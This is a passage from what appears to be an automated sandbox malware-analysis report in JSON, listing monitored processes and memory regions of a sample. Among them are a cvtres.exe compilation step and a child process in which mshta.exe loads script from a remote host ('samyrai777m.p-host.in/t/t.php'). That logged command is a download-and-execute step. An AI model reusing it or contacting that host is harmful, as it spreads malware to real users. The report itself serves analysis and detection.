"pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:01.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 303104, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5742591, "entry_point": 5439488, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Runtime.Remoting.dll", "id": "region_645", "name": "system.runtime.remoting.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.runtime.remoting.dll", "region_type": "memory_mapped_file", "start_va": 5439488, "timestamp": "00:01:01.652", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000646-addr_0x0000000002e00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 48234496, "type": "region", "version": 1 }, "end_va": 49283071, "entry_point": 0, "filename": null, "id": "region_646", "name": "private_0x0000000002e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 48234496, "timestamp": "00:01:01.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3190784, "start_va": 51970048, "type": "region", "version": 1 }, "end_va": 55160831, "entry_point": 51970048, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.dll", "id": "region_647", "name": "system.dll", "norm_filename": 
"c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.dll", "region_type": "memory_mapped_file", "start_va": 51970048, "timestamp": "00:01:01.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3096576, "start_va": 55181312, "type": "region", "version": 1 }, "end_va": 58277887, "entry_point": 55181312, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Data.dll", "id": "region_648", "name": "system.data.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.data.dll", "region_type": "memory_mapped_file", "start_va": 55181312, "timestamp": "00:01:01.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2048000, "start_va": 58327040, "type": "region", "version": 1 }, "end_va": 60375039, "entry_point": 58327040, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.XML.dll", "id": "region_649", "name": "system.xml.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.xml.dll", "region_type": "memory_mapped_file", "start_va": 58327040, "timestamp": "00:01:01.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 839680, "start_va": 60424192, "type": "region", "version": 1 }, "end_va": 61263871, "entry_point": 60424192, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Web.Services.dll", "id": "region_650", "name": "system.web.services.dll", "norm_filename": 
"c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.web.services.dll", "region_type": "memory_mapped_file", "start_va": 60424192, "timestamp": "00:01:01.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4567040, "start_va": 61276160, "type": "region", "version": 1 }, "end_va": 65843199, "entry_point": 61276160, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", "id": "region_651", "name": "mscorlib.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", "region_type": "memory_mapped_file", "start_va": 61276160, "timestamp": "00:01:01.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 180224, "start_va": 8791557865472, "type": "region", "version": 1 }, "end_va": 8791558045695, "entry_point": 8791557865472, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorpe.dll", "id": "region_652", "name": "mscorpe.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorpe.dll", "region_type": "memory_mapped_file", "start_va": 8791557865472, "timestamp": "00:01:01.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_653", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:01.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 21859663872, "type": "region", "version": 1 }, "end_va": 21860474879, "entry_point": 21859812720, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll", "id": "region_654", "name": "diasymreader.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll", "region_type": "memory_mapped_file", "start_va": 21859663872, "timestamp": "00:01:01.816", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000655-addr_0x0000000003ed0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 65863680, "type": "region", "version": 1 }, "end_va": 66912255, "entry_point": 0, "filename": null, "id": "region_655", "name": "private_0x0000000003ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 65863680, "timestamp": "00:01:02.078", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\RESEDB9.tmp\" \"c:\\Users\\aETAdzjz\\Desktop\\CSCED98.tmp\"", "filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cvtres.exe", "id": "proc_3", "image_name": "cvtres.exe", "monitor_reason": "child_process", "monitored_id": 
3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000656-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_656", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:02.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000657-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_657", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:02.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4247551, "entry_point": 4194304, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe", "id": "region_658", "name": "cvtres.exe", "norm_filename": 
"c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cvtres.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:02.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_659", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:02.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_660", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:02.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000661-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_661", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:02.113", "type": "region", "version": 
1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_662", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:02.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_663", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:02.115", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000664-addr_0x000007fffffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_664", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:02.116", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000003-region_00000665-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_665", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:02.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_666", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:02.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_667", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:02.125", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000668-addr_0x00000000002f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 
"ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_668", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:02.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_669", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:02.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_670", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:02.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 
131071, "entry_point": 0, "filename": null, "id": "region_671", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_672", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_673", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000674-addr_0x00000000001c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_674", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": 
"00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000675-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_675", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000676-addr_0x0000000000510000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_676", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000677-addr_0x0000000000550000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_677", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 
5570560, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_678", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_679", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:02.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_680", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:02.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_681", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:02.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_682", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:02.146", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_683", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:02.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, 
"start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_684", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:02.147", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_4", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000701-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_701", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_702", "name": 
"pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_703", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_704", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_705", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses 
maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_706", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:02.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_707", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:02.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 4288479232, "type": "region", "version": 1 }, "end_va": 4288544767, "entry_point": 4288479232, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_708", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 4288479232, "timestamp": "00:01:02.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": 
"region_709", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:02.800", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_710", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:02.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_711", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:02.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_712", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:02.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
